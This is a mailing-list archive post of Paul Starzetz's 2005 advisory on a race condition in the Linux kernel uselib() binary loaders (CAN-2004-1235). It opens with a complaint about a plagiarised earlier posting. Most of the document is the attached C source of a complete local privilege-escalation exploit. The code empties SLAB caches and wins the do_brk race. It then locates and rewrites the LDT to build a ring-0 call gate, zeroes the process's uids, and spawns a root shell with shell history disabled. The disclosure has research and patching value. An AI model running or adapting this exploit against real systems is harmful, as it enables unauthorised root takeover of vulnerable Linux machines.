lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.44.0501071309180.2904-200000@isec.pl>
From: ihaquer at isec.pl (Paul Starzetz)
Subject: Linux kernel uselib() privilege elevation,
	corrected

Hi all,

first of all I must comply about the handling of this vulnerability that I 
reported to vendorsec. Obviously my code posted there has been stolen and 
plagiated in order to put the blame on Stefan Esser from Ematters and 
disturb the security community. 

I really apologize to Stefan Esser for the inconvenience and thank him 
for his cool reaction - the plagiate worked.

---------------------------------------------------------------------------

Synopsis:  Linux kernel uselib() privilege elevation
Product:   Linux kernel
Version:   2.4 up to and including 2.4.29-rc2, 2.6 up to and including 2.6.10
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0021-uselib.txt
CVE:       CAN-2004-1235
Author:    Paul Starzetz <ihaquer@...c.pl>
Date:      Jan 07, 2005


Issue:
======

Locally  exploitable  flaws  have  been found in the Linux binary format
loaders'  uselib()  functions  that  allow  local  users  to  gain  root
privileges.


Details:
========

The Linux kernel provides a binary format loader layer to load (execute)
programs of different binary formats like ELF or  a.out  and  more.  The
kernel   also   provides   a  function  named  sys_uselib()  to  load  a
corresponding library.  This  function  is  dispatched  to  the  current
process's binary format handler and is basicaly a simplified mmap() code
coupled with some header parsing code.

An analyse of the uselib function load_elf_library()  from  binfmt_elf.c
revealed a flaw in the handling of the library's brk segment (VMA). That
segment is created with the  current->mm->mmap_sem  semaphore  NOT  held
while  modyfying  the  memory layout of the calling process. This can be
used to disturb the memory management and gain elevated privileges. Also
the binfmt_aout binary format loader code is affected in the same way.


Discussion:
=============

The  vulnerable  code  resides  for  example  in fs/binfmt_elf.c in your
kernel source code tree:

static int load_elf_library(struct file *file)
{
[904]  down_write(&current->mm->mmap_sem);
       error = do_mmap(file,
                     ELF_PAGESTART(elf_phdata->p_vaddr),
                     (elf_phdata->p_filesz +
                      ELF_PAGEOFFSET(elf_phdata->p_vaddr)),
                     PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_FIXED | MAP_PRIVATE | MAP_DENYWRITE,
                     (elf_phdata->p_offset -
                      ELF_PAGEOFFSET(elf_phdata->p_vaddr)));
       up_write(&current->mm->mmap_sem);
       if (error != ELF_PAGESTART(elf_phdata->p_vaddr))
              goto out_free_ph;

       elf_bss = elf_phdata->p_vaddr + elf_phdata->p_filesz;
       padzero(elf_bss);

       len = ELF_PAGESTART(elf_phdata->p_filesz + elf_phdata->p_vaddr + ELF_MIN_ALIGN - 1);
       bss = elf_phdata->p_memsz + elf_phdata->p_vaddr;
       if (bss > len)
              do_brk(len, bss - len);

The line numbers are all valid for the 2.4.28 kernel version. As can  be
seen  the  mmap_sem  is  released  prior to calling do_brk() in order to
create the data section of the ELF library. On the other  hand,  looking
into  the code of sys_brk() from mm/mmap.c reveals that do_brk() must be
called with the semaphore held.

A short look into the code of do_brk() shows that:

[1094] vma = kmem_cache_alloc(vm_area_cachep, SLAB_KERNEL);
       if (!vma)
              return -ENOMEM;

       vma->vm_mm = mm;
       vma->vm_start = addr;
       vma->vm_end = addr + len;
       vma->vm_flags = flags;
       vma->vm_page_prot = protection_map[flags & 0x0f];
       vma->vm_ops = NULL;
       vma->vm_pgoff = 0;
       vma->vm_file = NULL;
       vma->vm_private_data = NULL;

       vma_link(mm, vma, prev, rb_link, rb_parent);

where   rb_link   and   rb_parent   were   both   found    by    calling
find_vma_prepare().  Obviously,  if  the kmem_cache_alloc() call sleeps,
the newly created VMA descriptor  may  be  inserted  at  wrong  position
because the process's VMA list and the VMA RB-tree may have been changed
by another thread. This is absolutely enough to gain root privileges.

We  have  found  at  least  three  different  ways   to   exploit   this
vulnerability.  The  race condition can be easily won by consuming a big
amount of memory. A proof  of  concept  code  exists  but  will  not  be
released yet.


Impact:
=======

Unprivileged local users can gain elevated (root) privileges.


Credits:
========

Paul  Starzetz  <ihaquer@...c.pl>  has  identified the vulnerability and
performed further research. COPYING, DISTRIBUTION, AND  MODIFICATION  OF
INFORMATION  PRESENTED  HERE  IS ALLOWED ONLY WITH EXPRESS PERMISSION OF
ONE OF THE AUTHORS.


Disclaimer:
===========

This document and all the information it contains are provided "as  is",
for  educational  purposes  only,  without warranty of any kind, whether
express or implied.

The authors reserve the right not to be responsible for the  topicality,
correctness,  completeness  or  quality  of the information  provided in
this document. Liability claims regarding damage caused by  the  use  of
any  information  provided,  including  any kind of information which is
incomplete or incorrect, will therefore be rejected.


Appendix:
=========

Code attached.

------------------------------------------------------------------------

--
Paul Starzetz
iSEC Security Research
http://isec.pl/
-------------- next part --------------
/*
 *	binfmt_elf uselib VMA insert race vulnerability
 *	v1.08
 *
 *	gcc -O2 -fomit-frame-pointer elflbl.c -o elflbl
 *
 *	Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 *	THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 *	AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 *	WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */


#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <sched.h>
#include <syscall.h>
#include <limits.h>

#include <sys/types.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <sys/sysinfo.h>

#include <linux/elf.h>
#include <linux/linkage.h>

#include <asm/page.h>
#include <asm/ldt.h>
#include <asm/segment.h>

#define str(s) #s
#define xstr(s) str(s)

#define MREMAP_MAYMOVE  1


//	temp lib location
#define LIBNAME 	"/dev/shm/_elf_lib"

//	shell name
#define	SHELL		"/bin/bash"

//	time delta to detect race
#define RACEDELTA	5000

//	if you have more deadbabes in memory, change this
#define MAGIC		0xdeadbabe


//	do not touch
#define	SLAB_THRSH	128
#define	SLAB_PER_CHLD	(INT_MAX - 1)
#define LIB_SIZE	( PAGE_SIZE * 4 )
#define STACK_SIZE	( PAGE_SIZE * 4 )

#define LDT_PAGES	( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE )

#define ENTRY_GATE	( LDT_ENTRIES-1 )
#define SEL_GATE	( (ENTRY_GATE<<3)|0x07 )

#define ENTRY_LCS	( ENTRY_GATE-2 )
#define SEL_LCS		( (ENTRY_LCS<<3)|0x04 )

#define ENTRY_LDS	( ENTRY_GATE-1 )
#define SEL_LDS		( (ENTRY_LDS<<3)|0x04 )

#define kB		* 1024
#define MB		* 1024 kB
#define GB		* 1024 MB

#define TMPLEN		256
#define PGD_SIZE	( PAGE_SIZE*1024 )


extern char **environ;

static char cstack[STACK_SIZE];
static char name[TMPLEN];
static char line[TMPLEN];


static volatile int
	val = 0,
	go = 0,
	finish = 0,
	scnt = 0,
	ccnt=0,
	delta = 0,
	delta_max = RACEDELTA,
	map_flags = PROT_WRITE|PROT_READ;


static int
	fstop=0,
	silent=0,
	pidx,
	pnum=0,
	smp_max=0,
	smp,
	wtime=2,
	cpid,
	uid,
	task_size,
	old_esp,
	lib_addr,
	map_count=0,
	map_base=0,
	map_addr,
	addr_min,
	addr_max,
	vma_start,
	vma_end,
	max_page;


static struct timeval tm1, tm2;

static char *myenv[] = {"TERM=vt100",
			"HISTFILE=/dev/null",
			NULL};

static char hellc0de[] = "\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70"
                         "\x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75\x65\x52\x00";


static char *pagemap, *libname=LIBNAME, *shellname=SHELL;



#define __NR_sys_gettimeofday	__NR_gettimeofday
#define __NR_sys_sched_yield	__NR_sched_yield
#define __NR_sys_madvise	__NR_madvise
#define __NR_sys_uselib		__NR_uselib
#define __NR_sys_mmap2		__NR_mmap2
#define __NR_sys_munmap		__NR_munmap
#define __NR_sys_mprotect	__NR_mprotect
#define __NR_sys_mremap		__NR_mremap

inline _syscall6(int, sys_mmap2, int, a, int, b, int, c, int, d, int, e, int, f);

inline _syscall5(int, sys_mremap, int, a, int, b, int, c, int, d, int, e);

inline _syscall3(int, sys_madvise, void*, a, int, b, int, c);
inline _syscall3(int, sys_mprotect, int, a, int, b, int, c);
inline _syscall3( int, modify_ldt, int, func, void *, ptr, int, bytecount );

inline _syscall2(int, sys_gettimeofday, void*, a, void*, b);
inline _syscall2(int, sys_munmap, int, a, int, b);

inline _syscall1(int, sys_uselib, char*, l);

inline _syscall0(void, sys_sched_yield);



inline int tmdiff(struct timeval *t1, struct timeval *t2)
{
int r;

	r=t2->tv_sec - t1->tv_sec;
	r*=1000000;
	r+=t2->tv_usec - t1->tv_usec;
return r;
}


void fatal(const char *message, int critical)
{
int sig = critical? SIGSTOP : (fstop? SIGSTOP : SIGKILL);

	if(!errno) {
		fprintf(stdout, "\n[-] FAILED: %s ", message);
	} else {
		fprintf(stdout, "\n[-] FAILED: %s (%s) ", message,
			(char*) (strerror(errno)) );
	}
	if(critical)
		printf("\nCRITICAL, entering endless loop");
	printf("\n");
	fflush(stdout);

	unlink(libname);
	kill(cpid, SIGKILL);
	for(;;) kill(0, sig);
}


//	try to race do_brk sleeping on kmalloc, may need modification for SMP
int raceme(void* v)
{
	finish=1;

	for(;;) {
		errno = 0;

//	check if raced:
recheck:
		if(!go) sys_sched_yield();
		sys_gettimeofday(&tm2, NULL);
		delta = tmdiff(&tm1, &tm2);
		if(!smp_max && delta < (unsigned)delta_max) goto recheck;
		smp = smp_max;

//	check if lib VMAs exist as expected under race condition
recheck2:
		val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL);
		if(val) continue;
		errno = 0;
		val = sys_madvise((void*) (lib_addr+PAGE_SIZE),
				LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
		if( !val || (val<0 && errno!=ENOMEM) ) continue;

//	SMP?
		smp--;
		if(smp>=0) goto recheck2;

//	recheck race
		if(!go) continue;
		finish++;

//	we need to free one vm_area_struct for mmap to work
		val = sys_mprotect(map_addr, PAGE_SIZE, map_flags);
		if(val) fatal("mprotect", 0);
		val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE,
			      MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
		if(-1==val) fatal("mmap2 race", 0);
		printf("\n[+] race won maps=%d", map_count); fflush(stdout);
		_exit(0);
	}

return 0;
}


int callme_1()
{
	return val++;
}


inline int valid_ptr(unsigned ptr)
{
	return ptr>=task_size && ptr<addr_min-16;
}


inline int validate_vma(unsigned *p, unsigned s, unsigned e)
{
unsigned *t;

	if(valid_ptr(p[0]) && valid_ptr(p[3]) && p[1]==s && p[2]==e) {
		t=(unsigned*)p[3];
		if( t[0]==p[0] && t[1]<=task_size && t[2]<=task_size )
			return 1;
	}
	return 0;
}


asmlinkage void kernel_code(unsigned *task)
{
unsigned *addr = task;

//	find & reset uids
	while(addr[0] != uid || addr[1] != uid ||
	      addr[2] != uid || addr[3] != uid)
		addr++;

	addr[0] = addr[0] = addr[2] = addr[3] = 0;
	addr[4] = addr[5] = addr[6] = addr[7] = 0;

//	find & correct VMA
	for(addr=(unsigned *)task_size; (unsigned)addr<addr_min-16; addr++) {
		if( validate_vma(addr, vma_start, vma_end) ) {
			addr[1] = task_size - PAGE_SIZE;
			addr[2] = task_size;
			break;
		}
	}
}


void kcode(void);


void __kcode(void)
{
asm(
	"kcode:						\n"
	"	pusha					\n"
	"	pushl	%es				\n"
	"	pushl	%ds				\n"
	"	movl	$(" xstr(SEL_LDS) ") ,%edx	\n"
	"	movl	%edx,%es			\n"
	"	movl	%edx,%ds			\n"
	"	movl	$0xffffe000,%eax		\n"
	"	andl	%esp,%eax			\n"
	"	pushl	%eax				\n"
	"	call	kernel_code			\n"
	"	addl	$4, %esp			\n"
	"	popl	%ds				\n"
	"	popl	%es				\n"
	"	popa					\n"
	"	lret					\n"
    );
}


int callme_2()
{
	return val + task_size + addr_min;
}


void sigfailed(int v)
{
	ccnt++;
	fatal("lcall", 1);
}


//	modify LDT & exec
void try_to_exploit(unsigned addr)
{
volatile int r, *v;

	printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout);
	unlink(libname);

	r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags);
	if(r) fatal("mprotect 1", 1);

//	check if really LDT
	v = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE) );
	signal(SIGSEGV, sigfailed);
	r = *v;
	if(r != MAGIC) {
		printf("\n[-] FAILED val = 0x%.8x", r); fflush(stdout);
		fatal("find LDT", 1);
	}

//	yeah, setup CPL0 gate
	v[0] = ((unsigned)(SEL_LCS)<<16) | ((unsigned)kcode & 0xffffU);
	v[1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;
	printf("\n[+] gate modified ( 0x%.8x 0x%.8x )", v[0], v[1]); fflush(stdout);

//	setup CPL0 segment descriptors (we need the 'accessed' versions ;-)
	v = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE) );
	v[0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */
	v[1] = 0x00cf9b00;

	v = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE) );
	v[0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */
	v[1] = 0x00cf9300;

//	reprotect to get only one big VMA
	r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|map_flags);
	if(r) fatal("mprotect 2", 1);

//	CPL0 transition
	sys_sched_yield();
	val = callme_1() + callme_2();
	asm("lcall $" xstr(SEL_GATE) ",$0x0");
	if( getuid()==0 || (val==31337 && strlen(hellc0de)==16) ) {
		printf("\n[+] exploited, uid=0\n\n" ); fflush(stdout);
	} else {
		printf("\n[-] uid change failed" ); fflush(stdout);
		sigfailed(0);
	}
	signal(SIGTERM, SIG_IGN);
	kill(0, SIGTERM);
	execl(shellname, "sh", NULL);
	fatal("execl", 0);
}


void scan_mm_finish();
void scan_mm_start();


//	kernel page table scan code
void scan_mm()
{
	map_addr -= PAGE_SIZE;
	if(map_addr <= (unsigned)addr_min)
		scan_mm_start();

	scnt=0;
	val = *(int*)map_addr;
	scan_mm_finish();
}


void scan_mm_finish()
{
retry:
	__asm__("movl	%0, %%esp" : :"m"(old_esp) );

	if(scnt) {
		pagemap[pidx] ^= 1;
	}
	else {
		sys_madvise((void*)map_addr, PAGE_SIZE, MADV_DONTNEED);
	}
	pidx--;
	scan_mm();
	goto retry;
}


//	make kernel page maps before and after allocating LDT
void scan_mm_start()
{
static int npg=0;
static struct modify_ldt_ldt_s l;

	pnum++;
	if(pnum==1) {
		pidx = max_page-1;
	}
	else if(pnum==2) {
		memset(&l, 0, sizeof(l));
		l.entry_number = LDT_ENTRIES-1;
		l.seg_32bit = 1;
		l.base_addr = MAGIC >> 16;
		l.limit = MAGIC & 0xffff;
		l.limit_in_pages = 1;
		if( modify_ldt(1, &l, sizeof(l)) != 0 )
			fatal("modify_ldt", 1);
		pidx = max_page-1;
	}
	else if(pnum==3) {
		npg=0;
		for(pidx=0; pidx<=max_page-1; pidx++) {
			if(pagemap[pidx]) {
				npg++;
				fflush(stdout);
			}
			else if(npg == LDT_PAGES) {
				npg=0;
				try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE);
			} else {
				npg=0;
			}
		}
		fatal("find LDT", 1);
	}

//	save context & scan page table
	__asm__("movl	%%esp, %0" : :"m"(old_esp) );
	map_addr = addr_max;
	scan_mm();
}


//	return number of available SLAB objects in cache
int get_slab_objs(const char *sn)
{
static int c, d, u = 0, a = 0;
FILE *fp=NULL;

	fp = fopen("/proc/slabinfo", "r");
	if(!fp)
		fatal("get_slab_objs: fopen", 0);
	fgets(name, sizeof(name) - 1, fp);
	do {
		c = u = a = -1;
		if (!fgets(line, sizeof(line) - 1, fp))
			break;
		c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a,
			   &d, &d, &d, &d);
	} while (strcmp(name, sn));
	close(fileno(fp));
	fclose(fp);
	return c == 7 ? a - u : -1;
}


//	leave one object in the SLAB
inline void prepare_slab()
{
int *r;

	map_addr -= PAGE_SIZE;
	map_count++;
	map_flags ^= PROT_READ;

	r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags,
			     MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
	if(MAP_FAILED == r) {
		fatal("try again", 0);
	}
	*r = map_addr;
}


//	sig handlers
void segvcnt(int v)
{
	scnt++;
	scan_mm_finish();
}


//	child reap
void reaper(int v)
{
	ccnt++;
	waitpid(0, &v, WNOHANG|WUNTRACED);
}


//	sometimes I get the VMAs in reversed order...
//	so just use anyone of the two but take care about the flags
void check_vma_flags();

void vreversed(int v)
{
	map_flags = 0;
	check_vma_flags();
}


void check_vma_flags()
{
	if(map_flags) {
		__asm__("movl	%%esp, %0" : :"m"(old_esp) );
	} else {
		__asm__("movl	%0, %%esp" : :"m"(old_esp) );
		goto out;
	}
	signal(SIGSEGV, vreversed);
	val = * (unsigned*)(lib_addr + PAGE_SIZE);
out:
}


//	use elf library and try to sleep on kmalloc
void exploitme()
{
int r, sz, pcnt=0;
static char smiley[]="-\\|/-\\|/";

//	printf("\n    cat /proc/%d/maps", getpid() ); fflush(stdout);

//	helper clone
	finish=0; ccnt=0;
	sz = sizeof(cstack) / sizeof(cstack[0]);
	cpid = clone(&raceme, (void*) &cstack[sz-16],
			CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL );
	if(-1==cpid) fatal("clone", 0);

//	synchronize threads
	while(!finish) sys_sched_yield();
	finish=0;
	if(!silent) {
		printf("\n"); fflush(stdout);
	}

//	try to hit the kmalloc race
	for(;;) {

		r = get_slab_objs("vm_area_struct");
		while(r != 1) {
			prepare_slab();
			r--;
		}

		sys_gettimeofday(&tm1, NULL);
		go = 1;
		r=sys_uselib(libname);
		go = 0;
		if(r) fatal("uselib", 0);
		if(finish) break;

//	wipe lib VMAs and try again
		r = sys_munmap(lib_addr, LIB_SIZE);
		if(r) fatal("munmap lib", 0);
		if(ccnt) goto failed;

		if( !silent && !(pcnt%64) ) {
			printf("\r    Wait... %c", smiley[ (pcnt/64)%8 ]);
			fflush(stdout);
		}
		pcnt++;
	}

//	seems we raced, free mem
	r = sys_munmap(map_addr, map_base-map_addr + PAGE_SIZE);
	if(r) fatal("munmap 1", 0);
	r = sys_munmap(lib_addr, PAGE_SIZE);
	if(r) fatal("munmap 2", 0);
	
//	relax kswapd
	sys_gettimeofday(&tm1, NULL);
	for(;;) {
		sys_sched_yield();
		sys_gettimeofday(&tm2, NULL);
		delta = tmdiff(&tm1, &tm2);
		if( wtime*1000000U <= (unsigned)delta ) break;
	}

//	we need to check the PROT_EXEC flag
	map_flags = PROT_EXEC;
	check_vma_flags();
	if(!map_flags) {
		printf("\n    VMAs reversed"); fflush(stdout);
	}

//	write protect brk's VMA to fool vm_enough_memory()
	r = sys_mprotect((lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE,
			 PROT_READ|map_flags);
	if(-1==r) { fatal("mprotect brk", 0); }

//	this will finally make the big VMA...
	sz = (0-lib_addr) - LIB_SIZE - PAGE_SIZE;
expand:
	r = sys_madvise((void*)(lib_addr + PAGE_SIZE),
			LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
	if(r) fatal("madvise", 0);
	r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE,
			PAGE_SIZE, sz, MREMAP_MAYMOVE, 0);
	if(-1==r) {
		if(0==sz) {
			fatal("mremap: expand VMA", 0);
		} else {
			sz -= PAGE_SIZE;
			goto expand;
		}
	}
	vma_start = lib_addr + PAGE_SIZE;
	vma_end = vma_start + sz + 2*PAGE_SIZE;
	printf("\n    expanded VMA (0x%.8x-0x%.8x)", vma_start, vma_end);
	fflush(stdout);

//	try to figure kernel layout
	signal(SIGCHLD, reaper);
	signal(SIGSEGV, segvcnt);
	signal(SIGBUS, segvcnt);
	scan_mm_start();

failed:
	fatal("try again", 0);

}


//	make fake ELF library
void make_lib()
{
struct elfhdr eh;
struct elf_phdr eph;
static char tmpbuf[PAGE_SIZE];
int fd;

//	make our elf library
	umask(022);
	unlink(libname);
	fd=open(libname, O_RDWR|O_CREAT|O_TRUNC, 0755);
	if(fd<0) fatal("open lib ("LIBNAME" not writable?)", 0);
	memset(&eh, 0, sizeof(eh) );

//	elf exec header
	memcpy(eh.e_ident, ELFMAG, SELFMAG);
	eh.e_type = ET_EXEC;
	eh.e_machine = EM_386;
	eh.e_phentsize = sizeof(struct elf_phdr);
	eh.e_phnum = 1;
	eh.e_phoff = sizeof(eh);
	write(fd, &eh, sizeof(eh) );

//	section header:
	memset(&eph, 0, sizeof(eph) );
	eph.p_type = PT_LOAD;
	eph.p_offset = 4096;
	eph.p_filesz = 4096;
	eph.p_vaddr = lib_addr;
	eph.p_memsz = LIB_SIZE;
	eph.p_flags = PF_W|PF_R|PF_X;
	write(fd, &eph, sizeof(eph) );

//	execable code
	lseek(fd, 4096, SEEK_SET);
	memset(tmpbuf, 0x90, sizeof(tmpbuf) );
	write(fd, &tmpbuf, sizeof(tmpbuf) );
	close(fd);
}


//	move stack down #2
void prepare_finish()
{
int r;
static struct sysinfo si;

	old_esp &= ~(PAGE_SIZE-1);
	old_esp -= PAGE_SIZE;
	task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB;
	r = sys_munmap(old_esp, task_size-old_esp);
	if(r) fatal("unmap stack", 0);

//	setup rt env
	uid = getuid();
	lib_addr = task_size - LIB_SIZE - PAGE_SIZE;
	if(map_base)
		map_addr = map_base;
	else
		map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1);
	printf("\n[+] moved stack %x, task_size=0x%.8x, map_base=0x%.8x",
		old_esp, task_size, map_base); fflush(stdout);

//	check physical mem & prepare
	sysinfo(&si);
	addr_min = task_size + si.totalram;
	addr_min = (addr_min + PGD_SIZE - 1) & ~(PGD_SIZE-1);
	addr_max = addr_min + si.totalram;
	if((unsigned)addr_max >= 0xffffe000 || (unsigned)addr_max < (unsigned)addr_min)
		addr_max = 0xffffd000;

	printf("\n[+] vmalloc area 0x%.8x - 0x%.8x", addr_min, addr_max);
	max_page = (addr_max - addr_min) / PAGE_SIZE;
	pagemap = malloc( max_page + 32 );
	if(!pagemap) fatal("malloc pagemap", 1);
	memset(pagemap, 0, max_page + 32);

//	go go
	make_lib();
	exploitme();
}


//	move stack down #1
void prepare()
{
unsigned p=0;

	environ = myenv;

	p = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE,
		       MAP_PRIVATE|MAP_ANONYMOUS, 0, 0	);
	if(-1==p) fatal("mmap2 stack", 0);
	p += STACK_SIZE - 64;

	__asm__("movl	%%esp, %0	\n"
		"movl 	%1, %%esp	\n"
		: : "m"(old_esp), "m"(p)
	);

	prepare_finish();
}


void chldcnt(int v)
{
	ccnt++;
}


//	alloc slab objects...
inline void do_wipe()
{
int *r, c=0, left=0;

	__asm__("movl	%%esp, %0" : : "m"(old_esp) );

	old_esp = (old_esp - PGD_SIZE+1) & ~(PGD_SIZE-1);
	old_esp = map_base? map_base : old_esp;

	for(;;) {
		if(left<=0)
			left = get_slab_objs("vm_area_struct");
		if(left <= SLAB_THRSH)
			break;
		left--;

		map_flags ^= PROT_READ;
		old_esp -= PAGE_SIZE;
		r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags,
			MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 );
		if(MAP_FAILED == r)
			break;

		if(c>SLAB_PER_CHLD)
			break;
		if( (c%1024)==0 ) {
			if(!c) printf("\n");
			printf("\r    child %d VMAs %d", val, c);
			fflush(stdout);
		}
		c++;
	}
	printf("\r    child %d VMAs %d", val, c);
	fflush(stdout);
	kill(getppid(), SIGUSR1);
	for(;;) pause();
}


//	empty SLAB caches
void wipe_slab()
{
	signal(SIGUSR1, chldcnt);
	printf("\n[+] SLAB cleanup"); fflush(stdout);
	for(;;) {
		ccnt=0;
		val++;
		cpid = fork();
		if(!cpid)
			do_wipe();

		while(!ccnt) sys_sched_yield();
		if( get_slab_objs("vm_area_struct") <= SLAB_THRSH )
			break;
	}
	signal(SIGUSR1, SIG_DFL);
}


void usage(char *n)
{
	printf("\nUsage: %s\t-f forced stop\n", n);
	printf("\t\t-s silent mode\n");
	printf("\t\t-c command to run\n");
	printf("\t\t-n SMP iterations\n");
	printf("\t\t-d race delta us\n");
	printf("\t\t-w wait time seconds\n");
	printf("\t\t-l alternate lib name\n");
	printf("\t\t-a alternate addr hex\n");
	printf("\n");
	_exit(1);
}


//	give -s for forced stop, -b to clean SLAB
int main(int ac, char **av)
{
int r;

	while(ac) {
		r = getopt(ac, av, "n:l:a:w:c:d:fsh");
		if(r<0) break;

		switch(r) {

		case 'f' :
			fstop = 1;
			break;

		case 's' :
			silent = 1;
			break;

		case 'n' :
			smp_max = atoi(optarg);
			break;

		case 'd':
			if(1!=sscanf(optarg, "%u", &delta_max) || delta_max > 100000u )
				fatal("bad delta value", 0);
			break;

		case 'w' :
			wtime = atoi(optarg);
			if(wtime<0) fatal("bad wait value", 0);
			break;

		case 'l' :
			libname = strdup(optarg);
			break;

		case 'c' :
			shellname = strdup(optarg);
			break;

		case 'a' :
			if(1!=sscanf(optarg, "%x", &map_base))
				fatal("bad addr value", 0);
			map_base &= ~(PGD_SIZE-1);
			break;

		case 'h' :
		default:
			usage(av[0]);
			break;
		}
	}

//	basic setup
	uid = getuid();
	setpgrp();
	wipe_slab();
	prepare();

return 0;
}

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ